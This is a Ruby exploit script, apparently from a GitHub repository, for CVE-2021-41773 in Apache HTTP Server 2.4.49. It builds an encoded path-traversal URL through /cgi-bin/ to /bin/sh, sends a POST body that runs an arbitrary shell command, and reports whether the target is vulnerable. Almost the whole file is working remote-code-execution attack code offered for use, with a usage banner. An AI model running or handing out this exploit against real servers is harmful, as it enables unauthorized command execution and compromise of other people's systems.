-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2021-41773.rb
85 lines (71 loc) · 2.34 KB
/
CVE-2021-41773.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/ruby
#
# CVE-2021-41773 | Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks
# Coded By Habib | Twitter @hab1b0x | LinkedIn @habib0x
# Date | 15/03/2022 - 11:02 AM
#
require 'net/http'
# Simple & Strainght Forward Exploitation Of CVE-2021-41773
# Banner & Quick How to use
def title
puts """
# c c wWw wWw -2021-41773
# (OO) (O) (O) wWw
# ,'.--.) ( \ / ) (O)_
# / //_|_\ \ \ / / .' __)
# | \___ / \/ \ ( _)
# '. ) \ `--' / `.__)
# `-.' `-..-'
# Author:Habib
# ruby CVE-2021-41773.rb target_url dir command
# ruby CVE-2021-41773.rb http://localhost bin/sh whoami
"""
end
# If no arguments are given, show title & usage
if ARGV.empty?
title()
exit 0
end
# Get Target from stdin
target = ARGV[0]
dir = ARGV[1]
command = ARGV[2]
dir = 'bin/sh' if dir.nil?
# Check if target is valid
if not target.start_with?('http')
target = 'http://' + target
end
# Generate full url for launching the attack server
url = "#{target}/cgi-bin/.%2e/%2e%2e/%2e%2e/#{dir}"
uri = URI(url)
http = Net::HTTP.new(uri.host, uri.port)
# Use SSL/TLS if needed
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
# Make the request
req = Net::HTTP::Post.new(uri.request_uri)
req.body = "echo Content-Type: text/plain; echo;#{command}"
# Check response
response = http.request(req)
check_only = (command.nil? and dir.nil?)
bad_payload = (response.code == '403' or response.code == '404')
good_payload = (response.code == '200')
not_vulnerable = (response.code == '400')
if (check_only && bad_payload) || good_payload
puts "Target: #{target} is vulnerable\n"
puts "Command: #{response.body}" unless check_only
0
elsif bad_payload
puts "Target: #{target} is vulnerable but this payload is not" \
" working (HTTP error code: #{response.code})"
2
elsif not_vulnerable
puts "Target: #{target} is not vulnerable"
1
else
puts "Target: #{target} is not vulnerable" \
"(HTTP error code: #{response.code})"
127
end